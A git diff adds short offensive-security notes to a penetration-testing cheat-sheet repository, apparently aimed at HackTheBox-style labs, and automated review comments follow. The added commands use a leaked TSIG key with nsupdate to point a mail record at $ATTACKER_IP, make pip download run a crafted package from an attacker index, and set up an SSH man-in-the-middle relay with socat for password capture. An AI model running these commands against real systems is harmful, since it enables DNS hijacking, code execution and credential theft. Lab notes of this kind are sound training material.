diff --git a/Enumeration/DNS.md b/Enumeration/DNS.md index 0ed7fde..2188e9d 100644 --- a/Enumeration/DNS.md +++ b/Enumeration/DNS.md @@ -23,3 +23,21 @@ send quit ``` * Check domain by querying the subdomain's A record via dig/drill/nslookup + +### Found Secrets for Keys + +If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain. +```sh +nsupdate -d -y :: +Creating key... +namefromtext +keycreate + +server +update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP +send +``` + +Copy the lines, every space counts as it has to be exactly like in the example + + diff --git a/Exploits/Binaries/Tips & Tricks.md b/Exploits/Binaries/Tips & Tricks.md index 88cfec4..efac799 100644 --- a/Exploits/Binaries/Tips & Tricks.md +++ b/Exploits/Binaries/Tips & Tricks.md @@ -1,6 +1,6 @@ # Tips & Tricks for Binary Exploitations -# Toggle ASLR +## Toggle ASLR State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch. @@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd ## NULL bytes in Adresses NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes + +## Read from running process + +Read from a running process' stdout by attaching to the process via strace and read in the following way +```sh +strace -e read -p +``` diff --git a/Exploits/Python/Pip.md b/Exploits/Python/Pip.md new file mode 100644 index 0000000..697c47b --- /dev/null +++ b/Exploits/Python/Pip.md 
@@ -0,0 +1,12 @@ +# PIP Exploits + +## pip download + +Python pip executes tar files after the download option has been triggered. +Therefore, a hand crafted python module needs to be created and build. +After that pip can be used in the following way +```sh +pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v +``` + +An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/) diff --git a/Miscellaneous/SMTP.md b/Miscellaneous/SMTP.md index 5cf804f..49f640f 100644 --- a/Miscellaneous/SMTP.md +++ b/Miscellaneous/SMTP.md @@ -1,3 +1,10 @@ # SMTP * [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp) + +## Adhoc SMTP Server + +Set up an SMTP Server quickly using `maildev` +```sh +sudo maildev -s 25 --ip $ATTACKER_IP +``` diff --git a/Post Exploitation/Man in the Middle.md b/Post Exploitation/Man in the Middle.md index c9de410..b1209ac 100644 --- a/Post Exploitation/Man in the Middle.md +++ b/Post Exploitation/Man in the Middle.md @@ -1,5 +1,8 @@ # Man In the Middle + +## Ettercap + * [Ettercap](https://www.ettercap-project.org/) * [Bettercap](https://www.bettercap.org/) @@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) { msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n"); } ``` + * Escape double quote inside the payload string * compile via ```sh 
@@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef ```sh ettercap -T -i -M arp -F filter.ef ``` + +## mitm-server + +Set up a local Man in the middle server which can be used for example for password looting if somebody logs in. +[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`. + +Redirect the port to the mitm server and start it afterwards + +```sh +((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &) + +ssh-mitm server --remote-host $TARGET_IP +```
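Review bot: In the `Enumeration/DNS.md` hunk the command `nsupdate -d -y ::` and the bare `server` line are missing their arguments: `-y` expects a key specification of the form `[hmac:]keyname:secret`, and `server` needs the name server to send the update to, so the empty `::` and the lone `server` look like angle-bracket placeholders that were stripped when the markdown was rendered. Please restore them as visible placeholders (for example `$KEY_NAME:$KEY_SECRET` and `server $TARGET_DNS`), and pull the lines `Creating key...`, `namefromtext` and `keycreate` out of the block, since those are `-d` debug output rather than commands and will be pasted along with the rest given the instruction "Copy the lines, every space counts". Two wording points in the same hunk: "possiblity" should be "possibility", and a leaked TSIG key in `/etc/bind/named.conf` authorises dynamic updates to the zone, which is not the same as "join the domain"; the hard-coded `mail.snoopy.htb.` record should use a placeholder like the `$ATTACKER_IP` on the same line. The two trailing `+` blank lines at the end of the file can also be dropped.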
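Review bot: The "Read from running process" hunk in `Exploits/Binaries/Tips & Tricks.md` is inaccurate about what `strace -e read -p` shows: `-e read` is shorthand for `-e trace=read`, which traces the process's `read()` calls, i.e. the data it consumes, not its stdout. To observe what the process writes, trace `write` (`-e trace=write`), or use `-e write=1` to get a hex/ASCII dump of everything written to file descriptor 1. The `-p` argument is also missing its PID operand (another stripped placeholder; write it as `-p $PID`), and it is worth one sentence noting that attaching requires ptrace permission on the target, which `kernel.yama.ptrace_scope` restricts on most distributions.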
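Review bot: The new `Exploits/Python/Pip.md` states the mechanism imprecisely in "Python pip executes tar files after the download option has been triggered": pip does not execute archives; `pip download` of a source distribution runs the package's `setup.py` while building or preparing metadata, which is what the linked embracethered post describes and what makes the hand-crafted module's code run. Please reword accordingly, fix "build" to "built" and "An in detail blog post has been done by" to "A detailed write-up was published by", and add the defensive counterpart: `--only-binary=:all:` makes pip refuse source distributions and so avoids the build step. The example also combines `--index-url http://example.com` with `--trusted-host example.com`, which disables transport security for that index; that should be called out rather than left as a silent part of the command.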
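Review bot: The `Miscellaneous/SMTP.md` hunk is missing the installation step that the other new sections include (`npm install -g maildev`), and "Adhoc" should be "Ad hoc". Since `maildev` also starts its web UI (port 1080 by default) alongside the SMTP listener, and that UI exposes every captured message, the note should mention binding or firewalling it rather than only the SMTP port set by `-s 25 --ip $ATTACKER_IP`.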
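Review bot: In the first `Post Exploitation/Man in the Middle.md` hunk the new `## Ettercap` heading is inserted above both link bullets, so `* [Bettercap](https://www.bettercap.org/)` now sits under the Ettercap section. Either move the Bettercap link into its own subsection or keep the two links as a general list above the heading.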
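Review bot: In the `mitm-server` hunk the socat line `((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)` hard-codes `10.10.14.4`, while the next command uses `$TARGET_IP`; given that 10022 is the port the local `ssh-mitm server` listens on, this address is the listener's own host and should be written as `$ATTACKER_IP` (or `127.0.0.1`) for consistency. Without the `fork` option `TCP4-LISTEN:2222` accepts a single connection and then exits, so `TCP4-LISTEN:2222,fork` is needed for the redirect to stay up, and the nested `(( ... &) &)` is an unusual way to detach; a plain `socat ... &` or `nohup` is clearer. On wording: "Therefore, download the package via `pip install ssh-mitm`" should read "Install the package with `pip install ssh-mitm`", the link `https://docs.ssh-mitm.at/#` has a stray `#`, and "Man in the middle" should match the title's "Man In the Middle" capitalisation.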